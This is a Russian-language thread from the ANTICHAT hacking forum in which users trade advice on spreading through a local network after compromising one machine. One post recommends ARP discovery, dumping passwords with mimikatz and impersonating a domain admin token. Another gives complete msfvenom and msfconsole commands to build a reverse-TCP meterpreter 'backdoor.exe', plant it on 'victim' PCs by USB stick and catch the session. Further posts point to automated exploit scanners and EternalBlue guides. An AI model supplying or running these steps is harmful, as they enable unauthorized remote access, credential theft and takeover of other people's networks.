HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Этичный хакинг или пентестинг
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 14.10.2017, 06:28
BadBlackHat
Новичок
Регистрация: 05.02.2017
Сообщений: 0
С нами: 4877110

Репутация: 0
По умолчанию

Ну например со скомпроментированной машины arp запросом, выяснить адреса или имена других машин. После попробовать скомпроментировать их)) если сеть доменная или один администратор вытащи пароли, тем же mimikatz. Последний раз захват доменной сети делал с помощью impersonate token админа AD
 
Ответить с цитированием

  #2  
Старый 14.10.2017, 09:08
OBLIVIONNN
Новичок
Регистрация: 22.08.2017
Сообщений: 0
С нами: 4592342

Репутация: 0
По умолчанию

Цитата:

[ixTor] сказал(а):

подобрать сплоеты

Простите какими способами можно подобрать эксплоит именно для определенного сервиса + версий ?
Существую какие нибудь простые сканеры которые при сканирований дали простой ответ, есть эксплоит для этого сервиса который подходит 10-90% может использовать)
 
Ответить с цитированием

  #3  
Старый 14.10.2017, 10:51
OBLIVIONNN
Новичок
Регистрация: 22.08.2017
Сообщений: 0
С нами: 4592342

Репутация: 0
По умолчанию

Цитата:

[ixTor] сказал(а):

есть например команда searchsploit

Searchsploit в принципе ничем не отличается простым search в mete.
Вот допустим в RouterSploit все отлично сделано есть разные сканеры для всех типов роутеров + есть стандартный сканер Autopwn которое сканирует машину на все виды эксплоитов.(да автоматизировано для ленивых, но работает же)
Ну если в Metasploit вопрос решается простым поиском в Searchsploit , потом перебором всех эксплоитов то ладно.
[doublepost=1507963872,1507963019][/doublepost]

Цитата:

MrNik сказал(а):

Есть meterpreter на пк он находиться в Lan(local) в сети ещё три ПК они не имеют доступ к инту, как поставить на них meterpreter и получить сессию?

Если у тебя есть доступ к этим 3-ем ПК, то самый простой вариант.
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.свой ип lport=4444 -f exe -o backdoor.exe
создаем exe файл backdoor.exe и кидаем его через флешку или еще что нибудь на ПК жертвы.
Потом зайти в msfconsoleuse exploit/multi/handlerset payload windows/meterpreter/reverse_tcp
set LHOST 192.168.0.свой Локальный ип

set LPORT 4444

exploit


Если запустить backdoor.exe файл то, вы получите сессию meterprete.
Обрати внимание если Windows 64 битный , то надо использовать windows/x64/meterpreter/reverse_tcp.
Это если у тебя есть доступ к этим Пк, но если нету это уже другая история.
В принципе что бы больше таких вопросов не возникало советую прочитать.
https://hackware.ru/?p=2900
https://codeby.net/threads/hack-windows-10-meterpreter.58386/
https://codeby.net/threads/eternalblue-vzlom-windows-pc.59674/
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.